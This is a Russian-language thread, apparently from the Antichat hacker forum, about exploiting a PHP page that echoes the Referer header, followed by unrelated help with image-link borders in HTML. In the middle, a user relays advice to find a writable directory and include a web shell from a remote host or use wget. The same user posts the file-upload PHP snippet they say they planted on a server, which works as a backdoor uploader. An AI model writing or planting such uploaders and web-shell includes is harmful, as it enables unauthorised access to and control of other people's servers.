 |
|
05.02.2009, 17:52
|
|
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
С нами:
9443906
Репутация:
3313
|
|
Сообщение от Ink-developer
Народ подскажите если в файле php на сервере содержится нижеследующий код это является уязвимостью? Если да то что необходимо переслать в referer чтобы выполнить произвольный код.
PHP код:
<?
$referer=$_SERVER['HTTP_REFERER'];
echo"$referer";
?>
в вышеследующем коде нет ничего, кроме XSS
|
|
|
05.02.2009, 17:57
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами:
9999746
Репутация:
1318
|
|
ты никак не выполнишь PHP-код... Блин, ну черти! Ну поймите - PHP код выполняется на стороне сервера, в вашем же случае только клиентская сторона может быть уязвима. И вообще с такими вопросам марш в "Уязвимости".
|
|
|
|
05.02.2009, 18:15
|
|
Познающий
Регистрация: 26.01.2007
Сообщений: 40
С нами:
10152062
Репутация:
7
|
|
Сообщение от groundhog
Ну так найди диру куда можешь писать и запиши в файл инклуд какого-нибудь веб-шелла с удалённого хоста. Это во-первых, во-вторых попробуй wget
залил )
PHP код:
<form enctype=multipart/form-data method=post> <input name=userfile type=file> <input type=submit name=go></form> <?php if(isset($_POST))move_uploaded_file($_FILES,$_FILES); ?>
з.ы. через инклуд не получалось
Спасибо
|
|
|
|
05.02.2009, 18:41
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
С нами:
9326973
Репутация:
-25
|
|
Вопрос:
Зделал сылку на картинку и вокруг неё появилась синяя окантовка как на стондартной сылке! Как от неё избавиться?
|
|
|
|
05.02.2009, 18:46
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от geforce
Вопрос:
Зделал сылку на картинку и вокруг неё появилась синяя окантовка как на стондартной сылке! Как от неё избавиться?
Код:
<img src=site.ru/img.jpg></img>
|
|
|
|
05.02.2009, 18:50
|
|
Постоянный
Регистрация: 23.03.2006
Сообщений: 977
С нами:
10597286
Репутация:
694
|
|
если память мне не изменяет то в теге img есть атрибут border=0
или что то в этом духе.. уже забыл...  |
|
|
|
05.02.2009, 18:51
|
|
Постоянный
Регистрация: 23.03.2006
Сообщений: 977
С нами:
10597286
Репутация:
694
|
|
mailbrush, в чем прикол закрывающего img ?
|
|
|
|
05.02.2009, 19:02
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
mailbrush, в чем прикол закрывающего img ?
Хз, по привычке =)
если память мне не изменяет то в теге img есть атрибут border=0
или что то в этом духе.. уже забыл...
Да, но по дефолту он так и стоит (0). Чел наверное сделал как-то так (пишу по памяти):
Код HTML:
<a href=site.ru/img.jpg><img src=site.ru/img.jpg></img></a>
|
|
|
|
05.02.2009, 19:04
|
|
Участник форума
Регистрация: 06.06.2008
Сообщений: 162
С нами:
9436713
Репутация:
244
|
|
Епт, да ПРИЧЕМ здесь закрыт тег или нет? border="0" аттрибут ставь. ФФ и ИЕ обводят рамкой картинку иначе.
mailbrush зачем что-то писать если нихера не понимаешь.
|
|
|
|
05.02.2009, 20:45
|
|
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
С нами:
9560486
Репутация:
1809
|
|
Jer1cho, да да , по дефолту стоит обводка 1px если не ошибаюсь.
Можно еще так сделать:
Код HTML:
<img src="http://forum.antichat.ru/antichat/pic/logo.gif" style="border: solid 0px;" />
а закрывающий тег, необязательный в html ставят для совместимости с xhtml...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
